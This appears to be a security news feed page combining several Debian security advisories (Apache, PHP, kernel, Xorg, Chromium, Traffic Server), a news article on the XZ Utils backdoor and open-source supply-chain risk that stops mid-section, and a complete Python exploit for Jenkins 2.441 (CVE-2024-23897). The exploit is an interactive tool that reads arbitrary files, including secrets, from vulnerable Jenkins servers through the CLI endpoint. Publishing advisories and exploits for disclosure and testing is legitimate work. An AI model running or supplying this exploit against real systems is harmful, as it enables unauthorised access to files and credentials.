Debian Linux Security Advisory 5662-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5662-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 16, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : apache2  
CVE ID         : CVE-2023-31122 CVE-2023-38709 CVE-2023-43622  
                 CVE-2023-45802 CVE-2024-24795 CVE-2024-27316

Multiple vulnerabilities have been discovered in the Apache HTTP server,  
which may result in HTTP response splitting or denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.4.59-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.4.59-1~deb12u1.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/apache2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYewy0ACgkQEMKTtsN8  
Tja35g//YmcqUVOEofpDGsuxzNCW4N4w/9UKJ3Qevb+/+1Vr+HiA1YCckFIOAEVe  
Utic9aNRH3ujZpUWMSW4BDAvRma/iirXSEiuPc6C8YAgjFo7olgAhBgvDEKyHsD1  
cRIVk4GkwL/de0axePNugR4bX+N+ZpQkCDm1i9S54L+LoS/n73MJLkY2LIxzxZi0  
SuQ//DiAa7Q6fwN5jl1emRA28KMm72luOndiL7WuO+EdCF8HmkwhQwk0fjryCxru  
9xHu+k/Xk0Xqnl4AXAe9ghCxxb6/sYrYJvIFR0RxNcViRuIwC+ce1TwISYSfUphu  
q8kvfXmllI+FhUGG88KJMLl/7SO1oEEfUEtmWantxmPIjcBbx0fMbWtGxphXlzVW  
/V7w9aqaHg3eBQIg+9EfFIW++/fk9HEHIRU5j98x7Du/KuMJQGv1T+8/diGOSzof  
yGALRvHiTaOZGmgs2d6ng1y3t21/UJbQD7dxsGEigdBxCim62FxPm701nQ+aAdd9  
OWOqJJi48Z9CLpyIqFIF3T1pJ3G2kU9rWocJ1gaJMIH28pimgIMD1pM79uNA9cIl  
uxvmpT+ND9vhI9iCI9in9z6HosrKDlHdTGW8DgYUJmJNVS5QWEr0ivxarhaxff1S  
1xGJrU+t+Bo7mYzhM6vgdOA7YQp13ljMSPPu9dyd+j6W0sFfQUU=  
=GLD7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5662-1

Debian Linux Security Advisory 5661-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5661-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.18-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYMACgkQEMKTtsN8TjbrZxAAotqJ1fIulmY7fP/Ll2Gb/aoswnUqZTNiZH/yrzwX86cggI61EaWXc/JW7O5i7+U4y63ZIl5M6HVFk5bNgnj6Rwl5bT+jz8dbqLKkphIkT0754h1bdXCaW73riiNztNclAITPYMOntY7TEWZuqS2p4cNjUuHYoPiqCLU8ASMoi/z2DHFWBc6uBLRRRqbhbdFbWeekzc6nt+JZmEVD9JLXsh8kO4/f5o1pbCx6pYerWM1Win5AW6ZBSNMd5xO5DTP3F/RX7BEyH7rTQ0y2TRCY4qk2LKG4cojqidgHIpCiTiFiKvk9W3EJZdKebrzHyBgEixzCImvYze68j0M0ruxWiTTozKEn9Tj7DSPNoD+vB6U8kGAqmG3b5q+pw9BSCQ+AZ25HvDqdasH8gaj8Ji4xAhWxVutQRrSbhcf3xKu8Y6taz3ANIRXBmgjEARhK9p4b66KauAxG5GavWQQQprcbzt0deGUK6WkxigQ04l38kIrD9XIXnMHBEH4/Aas8E6zv8+j+18RdPaSGDGTAvuJD/C9GQjWfIvRXYVjUKarlWgtrgDoxGIMlOIHhRwgyJdZzJAx2vAY2o1CYmtIS59zReqwK+rAtogFi2RIoruVPGLccgxcqJOtvJF7MXGBAVp+3Wi4SFK5QHu1ISlngw+LkNJdkz1yXcUVI6vLt0QQEt94==xxUv-----END PGP SIGNATURE-----

Debian Security Advisory 5661-1

Debian Linux Security Advisory 5660-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5660-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the oldstable distribution (bullseye), these problems have been fixedin version 7.4.33-1+deb11u5.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYIACgkQEMKTtsN8Tjavcw//TgnidCQ8c0hut2Ni6PP87fZH1uZZM+gAjUxS46UpNjsDtlu9WwXAxH09+uq0tg/dvKQLkC5W5gnUBiYhiOVoo9U75QP8oK2EYXyswXuEsb9tUhI/hEYr7KYaNHPRbSxZoowi6hKpXXpjoXc/+J9nghykSL9WeADJw4qP6QTclN274IfSujpmx6z+YqApbtW8wzACmHpdvXfCge09NHiN0Z/U8mpd99JBNIYGJGaSDmGNrnGMzBhOms+PTCqQQZPWgWh4RlggNSlslEadGN1huf1KpdHlPvSEfRavmzloX1Vt+XUrJM47nkD3y6y5TtckhGm7horXlskSovkNQZoa5G8NhAT1trzhfP07QJWJBrcc8MZzJQYiwlqZAf/zY8/UcusrJj3Y8BdkfbdWb69PA6sC2qTDuj48p7adgYBZ5YOwmrC4dcwdRd9laGqnZAhk1htX19Gzt1gYL2wDPMU+2x+F0rbemXGS6UwRmrkSlTiWVka+T5y+JpC8lLXFR2dwF2KAdUK4dWPd5QUrNb0Tk9dBcEZuyLRevindp7gCKLx/1y/RsrNxT8b1yW5yUp9jtePFa83+jNyojvURlC0SAgTcwEUhltob4vsTAccZZSza3cxOlqzC7ysNd0TKz20rTZFKreygYyIXfmHHaWoYbiK5IEy1ogOVho9SXUYJ7Mc==ZcwU-----END PGP SIGNATURE-----

Debian Security Advisory 5660-1

Debian Linux Security Advisory 5659-1 - Bartek Nowotarski discovered that Apache Traffic Server, a reverse and forward proxy server, was susceptible to denial of service via HTTP2 continuation frames.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5659-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 14, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2024-31309Bartek Nowotarski discovered that Apache Traffic Server, a reverse andforward proxy server, was susceptible to denial of service via HTTP2continuation frames.For the oldstable distribution (bullseye), this problem has been fixedin version 8.1.10+ds-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 9.2.4+ds-0+deb12u1.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYcGbUACgkQEMKTtsN8TjZEQw//YeLDMyZ2KnFxSaZbRAv/UkFNmOsYEwNtYn7xDTdogl3jRWNgqye4wwK2IHB9H4r3n91yBEmQ8CeRTMk07/VI1salyaXHPy5lCK+FuBEp4g5pWT6aCAb6z1KWxfD7AUzFbnLOvLCINvNcnDrYQAn+qaVUxXaD4ArvzjFEfw+AMDNCEnRsiQs83lPzDr5Bm48WYK9MAJteuDoFbWYHjcpyY0ZNxj7VtZP6cSKBqDXcPOjaUZysJjDX3cXqCHEioz3X35SJa+GckVD90h7wzDSHZSaDflUVLc4wwZ5ZNZkzOBKwCvurh52f79hVVjRjlO9UzY+VNuBOqtgP8nX9ByTNDkcsa7Rojgv56km58OIheALPoDHJiTpEWt2CPhxwV3oFYNQzBu2akbCdW+s+ir8p4uS4BxK6B6gz+lfnFuQ+L1MIJtlSDoPu08IYf79aYJKMA33+hXL1rjCggWu1EfofQpQMB/yJkxK/dN4A2xKI91XJshIUPQAcScjDHYnomfBAPzcbiRlYgjJS9WXR7gckX5fKjR9MPOD4t9vaGpy+wMARAFNRxCVBnl/QLsRkpwoAznbqGknXtWsbqNjhkRaLIpLG29YS6gBD4c4D8Q5WKgU7hNC+m4ZZK49u495fwFbQi2nVzn3boCTNIeJDvqrZ0pRePIl97zjzyhxg8PFrgLA==XO+d-----END PGP SIGNATURE-----

Debian Security Advisory 5659-1

Debian Linux Security Advisory 5658-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5658-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 13, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-2176 CVE-2023-6270 CVE-2023-7042 CVE-2023-28746  
                 CVE-2023-47233 CVE-2023-52429 CVE-2023-52434 CVE-2023-52435  
                 CVE-2023-52583 CVE-2023-52584 CVE-2023-52587 CVE-2023-52588  
                 CVE-2023-52589 CVE-2023-52593 CVE-2023-52594 CVE-2023-52595  
                 CVE-2023-52597 CVE-2023-52598 CVE-2023-52599 CVE-2023-52600  
                 CVE-2023-52601 CVE-2023-52602 CVE-2023-52603 CVE-2023-52604  
                 CVE-2023-52606 CVE-2023-52607 CVE-2023-52616 CVE-2023-52617  
                 CVE-2023-52618 CVE-2023-52619 CVE-2023-52620 CVE-2023-52621  
                 CVE-2023-52622 CVE-2023-52623 CVE-2023-52630 CVE-2023-52631  
                 CVE-2023-52632 CVE-2023-52633 CVE-2023-52635 CVE-2023-52637  
                 CVE-2023-52638 CVE-2023-52639 CVE-2023-52640 CVE-2023-52641  
                 CVE-2024-0340 CVE-2024-0841 CVE-2024-1151 CVE-2024-2201  
                 CVE-2024-22099 CVE-2024-23850 CVE-2024-23851 CVE-2024-24857  
                 CVE-2024-24858 CVE-2024-26581 CVE-2024-26582 CVE-2024-26583  
                 CVE-2024-26584 CVE-2024-26585 CVE-2024-26586 CVE-2024-26590  
                 CVE-2024-26593 CVE-2024-26600 CVE-2024-26601 CVE-2024-26602  
                 CVE-2024-26603 CVE-2024-26606 CVE-2024-26621 CVE-2024-26622  
                 CVE-2024-26625 CVE-2024-26626 CVE-2024-26627 CVE-2024-26629  
                 CVE-2024-26639 CVE-2024-26640 CVE-2024-26641 CVE-2024-26642  
                 CVE-2024-26643 CVE-2024-26651 CVE-2024-26654 CVE-2024-26659  
                 CVE-2024-26660 CVE-2024-26663 CVE-2024-26664 CVE-2024-26665  
                 CVE-2024-26667 CVE-2024-26671 CVE-2024-26673 CVE-2024-26675  
                 CVE-2024-26676 CVE-2024-26679 CVE-2024-26680 CVE-2024-26681  
                 CVE-2024-26684 CVE-2024-26685 CVE-2024-26686 CVE-2024-26687  
                 CVE-2024-26688 CVE-2024-26689 CVE-2024-26695 CVE-2024-26696  
                 CVE-2024-26697 CVE-2024-26698 CVE-2024-26700 CVE-2024-26702  
                 CVE-2024-26704 CVE-2024-26706 CVE-2024-26707 CVE-2024-26710  
                 CVE-2024-26712 CVE-2024-26714 CVE-2024-26715 CVE-2024-26717  
                 CVE-2024-26718 CVE-2024-26720 CVE-2024-26722 CVE-2024-26723  
                 CVE-2024-26726 CVE-2024-26727 CVE-2024-26731 CVE-2024-26733  
                 CVE-2024-26735 CVE-2024-26736 CVE-2024-26737 CVE-2024-26741  
                 CVE-2024-26742 CVE-2024-26743 CVE-2024-26744 CVE-2024-26745  
                 CVE-2024-26747 CVE-2024-26748 CVE-2024-26749 CVE-2024-26750  
                 CVE-2024-26751 CVE-2024-26752 CVE-2024-26753 CVE-2024-26754  
                 CVE-2024-26759 CVE-2024-26760 CVE-2024-26761 CVE-2024-26763  
                 CVE-2024-26764 CVE-2024-26765 CVE-2024-26766 CVE-2024-26769  
                 CVE-2024-26771 CVE-2024-26772 CVE-2024-26773 CVE-2024-26774  
                 CVE-2024-26775 CVE-2024-26776 CVE-2024-26777 CVE-2024-26778  
                 CVE-2024-26779 CVE-2024-26780 CVE-2024-26781 CVE-2024-26782  
                 CVE-2024-26787 CVE-2024-26788 CVE-2024-26789 CVE-2024-26790  
                 CVE-2024-26791 CVE-2024-26792 CVE-2024-26793 CVE-2024-26795  
                 CVE-2024-26798 CVE-2024-26800 CVE-2024-26801 CVE-2024-26802  
                 CVE-2024-26803 CVE-2024-26804 CVE-2024-26805 CVE-2024-26809  
                 CVE-2024-26810 CVE-2024-26811 CVE-2024-26812 CVE-2024-26813  
                 CVE-2024-26814 CVE-2024-26815 CVE-2024-26816 CVE-2024-27437

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.85-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYaIyZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RN3A/9HbzpFDgN8uqJJVEHYgDh38m+h/8maSC2qL3G9ZPEckWX6MLBm+yBWcJ0  
l/DesFcqc5Lh25bgWSO2jJ4TY4+dbTRFzFcJ/aTnbOKGoGCUQt0W9ZHFVwmkPKQN  
tbZm1W1K3u/5dz8qow1ntsQuBarD0uDpImbhOZdrk+n88yKVB4lqAqNgel6EPt03  
6SYAz/A3S1A3cgTEwz9udrA6du7yX/2vFwd9g4CO96VflHBgsHSnWAnmJZScZjIA  
MT8jWGEXUw0zPg78w6AieLWhXTRe/bRxzhPRtYMOwXu1rX3wcPO8cbF9+hgbdj9w  
VD+qKTP3PWzP7nxJ3KLRUf8NvHjOI5CvVJFR3UFVlOE+BtYO//POTZI9eUv9tU3x  
vqXXTuHN+uXHkOtvRImx0Hf6FxjQbdh6IuvK6ipb/YH6IE2jZOw94AYi75UkDkgf  
VBbQf7eShv81Z05tZQo1rFHQMYBbGjtpudJllQ8/zmbv+hM9WuL4NCkw6EQytFPU  
51lVn/8Cqx1wt0IAmKr4FQ3hz/d766jgQvByFQWhqs1ZD7vQy2SxbzzTsKT1Zlha  
GsRB5LNZXvIwZi/A4ls7+4YM4urbRljMFgU7sUaNl+nbhqcw0y/AoLcUGO+7vl6L  
S/9Mmm8mnmXvTTYCgw9tuLo/wCP9UlF5PTEsZTQyslJYVxu/bvQ=  
=IM/D  
-----END PGP SIGNATURE-----

Debian Security Advisory 5658-1txt

Debian Linux Security Advisory 5657-1 - Several vulnerabilities were discovered in the Xorg X server, which may result in privilege escalation if the X server is running privileged or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5657-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 12, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2024-31080 CVE-2024-31081 CVE-2024-31083

Several vulnerabilities were discovered in the Xorg X server, which may  
result in privilege escalation if the X server is running privileged  
or denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2:1.20.11-1+deb11u13.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:21.1.7-3+deb12u7.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYZmfJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qz4w//cyMczPAsPfqta3Jcw9cclEKJ2EC6p7c1SWm3c16rHyL+pOfcFsNuUrCR  
H+JPZ8x2qSk5MSJ1AFC4WUJptZup9WlTIfdSNtPJ/T+uweDpEbMGp0dl2DNu5AIP  
riPtam1aVHUsOr7rT4EzBcRK6hZSltgKZjBeu5vdZLDpexOrGTBx6KmjB62+G21P  
3/pog2OVvGi3x6PBsQizEQRW4RP8UsfLEt2EaCxgZKlR+4lfbaSyrKFXolSSbtUR  
lRur+6dy4569c2Ja844W1MFAtXPre6iFLzhwQNuagwTo4V8OqPAi1vjIpjg/vE2S  
s9icZpqJMnFuAEvqoUQ9h5hByZtvGYOxoj8xbT5HCwIzro3K2+eEUpPCBZDqfdxh  
46a7cShJSPzPSgMaZDhi3+BnmmK5GN/cuaUD9YMm2o5JkRxrRjOyo0P/1yvLAV4/  
66XCXbWFUkLNVAi2Z+VI8vJ+cndQ5x1sSxv8HbNTpDSYeazoUFcvfwvFyok+HQYt  
OUu22K/TR7ejYGCWXEg/WOqQxgPk63IB2JvuyGRkshis5gKtOstUjPIpvsGpevq+  
dMuvY63hnZkJYhqTV9nD0YUg7+H6GznxRcOG/YQmzmpu9htpaotmwCucRi2tAS6A  
v4Vd90kzBGPcatElBnPkulj9piI+nFaQT40y5ekG8bXVdCYgDQM=  
=Hr75  
-----END PGP SIGNATURE-----

Debian Security Advisory 5657-1

Jenkins version 2.441 suffers from a local file inclusion vulnerability.

# Exploit Title: Jenkins 2.441 - Local File Inclusion  
# Date: 14/04/2024  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.jenkins.io/  
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip  
# Version: 2.441  
# Tested on: Debian 12 (Bookworm)  
# CVE: CVE-2024-23897

from argparse import ArgumentParser  
from requests import Session, post, exceptions  
from threading import Thread  
from uuid import uuid4  
from time import sleep  
from re import findall

class Exploit(Thread):  
  def __init__(self, url: str, identifier: str):  
    Thread.__init__(self)  
    self.daemon = True  
    self.url = url  
    self.params = {"remoting": "false"}  
    self.identifier = identifier  
    self.stop_thread = False  
    self.listen = False

  def run(self):  
    while not self.stop_thread:  
      if self.listen:  
        self.listen_and_print()

  def stop(self):  
    self.stop_thread = True

  def receive_next_message(self):  
    self.listen = True

  def wait_for_message(self):  
    while self.listen:  
      sleep(0.5)

  def print_formatted_output(self, output: str):  
    if "ERROR: No such file" in output:  
      print("File not found.")  
    elif "ERROR: Failed to parse" in output:  
      print("Could not read file.")

    expression = "No such agent \"(.*)\" exists."  
    results = findall(expression, output)  
    print("\n".join(results))

  def listen_and_print(self):  
    session = Session()  
    headers = {"Side": "download", "Session": self.identifier}  
    try:  
      response = session.post(self.url, params=self.params, headers=headers)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to target to setup the listener.")  
      exit(1)

    self.print_formatted_output(response.text)  
    self.listen = False

  def send_file_request(self, filepath: str):  
    headers = {"Side": "upload", "Session": self.identifier}  
    payload = get_payload(filepath)  
    try:  
      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to the target to send the request.")  
      exit(1)

  def read_file(self, filepath: str):  
    self.receive_next_message()  
    sleep(0.1)  
    self.send_file_request(filepath)  
    self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:  
  text_bytes = bytes(text, "utf-8")  
  text_size = len(text_bytes)  
  text_message = text_size.to_bytes(2) + text_bytes  
  message_size = len(text_message)

  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message  
  return payload

def get_payload(filepath: str) -> bytes:  
  arg_operation = 0  
  start_operation = 3

  command = get_payload_message(arg_operation, "connect-node")  
  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

  payload = command + poisoned_argument + start_operation.to_bytes(1)  
  return payload

def start_interactive_file_read(exploit: Exploit):  
  print("Press Ctrl+C to exit")  
  while True:  
    filepath = input("File to download:\n> ")  
    filepath = make_path_absolute(filepath)  
    exploit.receive_next_message()

    try:  
      exploit.read_file(filepath)  
    except exceptions.ReadTimeout:  
      print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:  
    if not filepath.startswith('/'):  
      return f"/proc/self/cwd/{filepath}"  
    return filepath

def format_target_url(url: str) -> str:  
  if url.endswith('/'):  
    url = url[:-1]  
  return f"{url}/cli"

def get_arguments():  
  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")  
  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")  
  parser.add_argument("-p", "--path", help="The absolute path of the file to download")  
  return parser.parse_args()

def main():  
  args = get_arguments()  
  url = format_target_url(args.url)  
  filepath = args.path  
  identifier = str(uuid4())

  exploit = Exploit(url, identifier)  
  exploit.start()

  if filepath:  
    filepath = make_path_absolute(filepath)  
    exploit.read_file(filepath)  
    exploit.stop()  
    return

  try:  
    start_interactive_file_read(exploit)  
  except KeyboardInterrupt:  
    pass  
  print("\nQuitting")  
  exploit.stop()

if __name__ == "__main__":  
  main()

Jenkins 2.441 Local File Inclusion

Debian Linux Security Advisory 5656-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5656-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 11, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3157 CVE-2024-3515 CVE-2024-3516Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.122-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYYJcAACgkQZF0CR8NudjdhkRAAw6sMjh+3xY72+Q5DbvExle0J+9jEL9OALHhrVvWzGpUQjOx4sw64m03ZOV6G9W7/j5EqzMeSKrVFdRi+e/mANlBrXs4QfH1O+5cMD9fYUO/d6nPbFQJXwYOeU4GINkJOv690CQcIVAei1Udp6dmwL8pe4BAVTnDqWWgyxhBubBPM+RLVBu6/gKFa6Fm8fyOjcuwrwsdCVFNd2T9hICnQNLbh3DOFJ+6ElFCYDvcNbfdfYOXh/NIs3x8eImguEPsm8u4VmDAyg6JUZunUSiXFeVFqwmbiBDaloXjLsTRu2uBjeQcdMrU/FoZoKataksl5MZJmfsRspCIina4WOWkeL1tcg3texfCFVQ/XWreJKvFoyGOdBXcAVEcY+ePDmkahmQu3QyOB/QD4bxq76T2bwWylpB95S8f31Dr1SiJ3ru7NjKQsezxls3Ey1IWBia/qG4rYtmjwi/zcyTeejROSTXLBeCvOKFe7jPCw6iQ5fZb9eWtiBbJ2mIJBhSyrSzCKbfQjSRpV2JHPp5A7IksBcq8gtoL3L3ubhnaFsTvvtPeTQQK3pJvN+sZgnx/QMVSl2Kh/6HF28JqOPqGZWtSE+fcoQM0zubO41/LGOowNzvFK3rIa+iolu+iSykup40Xmr3sh+q8HSDKweX3znVFj+JFd9pk6DiTBwcKDjipTKlA==Cqgo-----END PGP SIGNATURE-----

Debian Security Advisory 5656-1

Much of the open source code embedded in enterprise software stacks comes from small, under-resourced, volunteer-run projects.

Source: Juliana\_haris via Shutterstock

The recent discovery of a backdoor in the XZ Utils data compression utility — present in nearly all major Linux distributions — is a stark reminder that organizations who consume open source components ultimately own responsibility for securing the software.

XZ Utils, like thousands of other open source projects, is volunteer-run and, in its case, has a single maintainer managing it. Such projects often have little to no resources for handling security issues, meaning organizations use the software at their own risk. That means security and development teams must implement measures for managing open source risk the same way they do with internally developed code, security experts say.

"While it's unlikely an organization can effectively prevent \[all\] exposure to supply chain risks, organizations can absolutely focus on a strategy to reduce the probability that a supply chain attack is successful," says Jamie Scott, founding product manager at Endor Labs.

Open source is not the same as outsourcing: "Open source maintainers of software are volunteers. At an industry level, we need to treat them as such. We own our software; we are responsible for the software we re-use."

**Well-Intentioned, Under-Resourced**

Concerns over open source software security are by no means new. But it often takes discoveries like the Log4Shell vulnerability and the backdoor in XZ Utils to really drive home just how vulnerable organizations are to components in their code. And often, the code comes from well-intentioned yet hopelessly under-resourced open source projects that are minimally maintained.

XZ Utils, for instance, is essentially a one-person project. Another individual managed to sneak the backdoor into the utility over a nearly three-year period, by gradually gaining enough trust from the project maintainer. If a Microsoft developer had not chanced upon it in late March when investigating odd behavior associated with a Debian installation, the backdoor might well have ended up on millions of devices globally — including those belonging to large corporations and government agencies. As it turned out, the backdoor had minimal impact because it affected versions of XZ Utils that were only present in unstable and beta versions of Debian, Fedora, Kali, open SUSE, and Arch Linux.

The next such open source code compromise could be far worse. "The scariest part for enterprise organizations is that their applications are built on top of open source software projects just like XZ Utils," says Donald Fischer, co-founder and CEO of Tidelift. "XZ Utils is one package of tens of thousands that are in use every day by typical enterprise organizations," he says.

Most of these organizations lack sufficient visibility into the security and resilience of this part of their software supply chain to be able to evaluate risk, he notes.

A recent Harvard Business School study estimated the demand-side value of open source software to be an astonishing $8.8 trillion. Maintainers are at the core of this ecosystem and many of them are flying solo, Fischer says. A survey conducted by Tidelift last year found 44% of open source project maintainers describe themselves as the sole maintainers of their projects. Sixty percent identified themselves as unpaid hobbyists, and the same percentage said they have either quit or have considered quitting their roles as project maintainers. Many maintainers described their efforts as stressful, lonely, and financially unrewarding work, Fischer says.

"The XZ utils hack brings into stark relief the risks of under-investing in the health and resilience of the open source software supply chain \[that\] enterprise organizations rely on," Fischer says. "Enterprise organizations need to realize that the majority of the most relied-upon open source packages are maintained by volunteers who describe themselves as unpaid hobbyists. These maintainers are not enterprise suppliers but are expected to work and deliver like them."

**Danger: Transitive Dependencies**

A study that Endor conducted in 2022 found that 95% of open source vulnerabilities are present in so-called transitive dependencies, or secondary open source packages or libraries that a primary open-source package might depend upon. Often, these are packages that developers don't directly select themselves but are automatically employed by an open source package in their development project.

"For example, when you trust one Maven package, on average there are an additional 14 dependencies you implicitly trust as a result," Scott says. "This number is even larger in certain software ecosystems such as NPM where you on average import 77 other software components for every one you trust."

One way to start start mitigating open source risks is to pay attention to these dependencies and be selective about what projects you choose, he says.

Organizations should vet dependencies, especially the smaller, one-off-packages, manned by one- and two-person teams, adds Dimitri Stiliadis, Endor's CTO and co-founder. They should determine if dependencies in their environment have proper security controls or if a single individual commits all code; whether they have binary files in their repositories that no one knows about; or even if someone is actively maintaining the project at all, Stiliadis says.

"Focus your efforts on improving your response effectiveness — foundational controls such as maintaining a mature software inventory remains one of the highest value programs you can have in place to quickly identify, scope, and respond to software risks once they're identified," Scott advises.

Software-composition analysis tools, vulnerability scanners, EDR/XDR systems, and SBOMs can also all help organizations quickly identify vulnerable and compromised open source components.

**Acknowledging the Threat**

